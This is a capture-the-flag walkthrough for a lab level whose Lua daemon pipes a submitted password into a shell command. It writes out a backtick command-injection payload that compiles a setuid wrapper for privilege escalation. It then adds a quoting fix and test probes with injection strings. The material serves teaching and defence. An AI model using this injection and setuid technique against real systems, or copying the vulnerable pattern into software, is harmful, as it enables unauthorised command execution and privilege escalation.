About
There is a backdoor process listening on port 50001.
To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))

function hash(password)
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local line, err = client:receive()
  if not err then
    print("trying " .. line) -- log from where ;\
    local h = hash(line)

    if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
      client:send("Better luck next time\n");
    else
      client:send("Congrats, your token is 413**CARRIER LOST**\n")
    end

  end

  client:close()
end
After an initial read it is obvious that commands have to be executed through the hash() function: it concatenates the received password straight into the shell command line passed to io.popen().
Which commands to run, and how, is just as obvious.
So in this level (as before) we will reuse the technique from an older challenge (namely level03).
First create the wrapper /tmp/pwn.c:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    system("/bin/getflag");
    return 0;
}

Next, telnet to the server and enter the magic string:
level12@nebula:~$ telnet localhost 50001
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Password: `gcc /tmp/pwn.c -o /tmp/pwn && chmod +s /tmp/pwn`;#
Better luck next time
Connection closed by foreign host.
After that we have a SUID binary pwn under /tmp:
level12@nebula:~$ /tmp/pwn
You have successfully executed getflag on a target account
Roger-out.
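
The injection works because hash() pastes the received line into the string given to io.popen(). As an added example (not part of the original write-up or of the level's code), here is one way the daemon's author could hash the input without letting the shell parse it; shell_quote and safe_hash are hypothetical names, and a POSIX sh with printf and sha1sum on PATH is assumed.

```lua
-- Added example; shell_quote and safe_hash are hypothetical names.
-- Assumes a POSIX /bin/sh with printf and sha1sum on PATH.

-- Turn s into a single literal shell word: wrap it in single quotes and
-- rewrite every embedded ' as '\'' (close quote, escaped quote, reopen).
local function shell_quote(s)
  return "'" .. (s:gsub("'", "'\\''")) .. "'"
end

-- Replacement for hash(): sha1sum still receives "password plus newline",
-- but the password never reaches the shell as syntax.
local function safe_hash(password)
  -- A NUL byte cannot be passed in an argument; cap the length as well.
  if #password > 256 or password:find("\0", 1, true) then
    return nil, "rejected input"
  end
  local cmd = "printf '%s\\n' " .. shell_quote(password) .. " | sha1sum"
  local prog = assert(io.popen(cmd, "r"))
  local data = prog:read("*a")
  prog:close()
  local digest = data:sub(1, 40)
  -- Fail closed if sha1sum did not produce a 40-digit hex digest.
  if not digest:match("^" .. ("%x"):rep(40) .. "$") then
    return nil, "unexpected sha1sum output"
  end
  return digest
end

-- Constructed probes: shell metacharacters must hash as plain bytes.
local probes = {
  "letmein",
  "`echo injected`;#",   -- backticks and a trailing comment, as in the level
  "$(echo injected)",
  "it's; echo injected",
}
for _, p in ipairs(probes) do
  local digest = assert(safe_hash(p))
  -- Same input gives the same digest, and no probe collapses to the
  -- digest of the word its embedded command would have printed.
  assert(digest == safe_hash(p))
  assert(digest ~= safe_hash("injected"))
  print(digest, p)
end
assert(safe_hash(("a"):rep(300)) == nil)
```

Stock Lua can only start processes through the shell, so quoting the argument is the fix available without extra modules; a SHA-1 library binding would remove the shell from the daemon altogether.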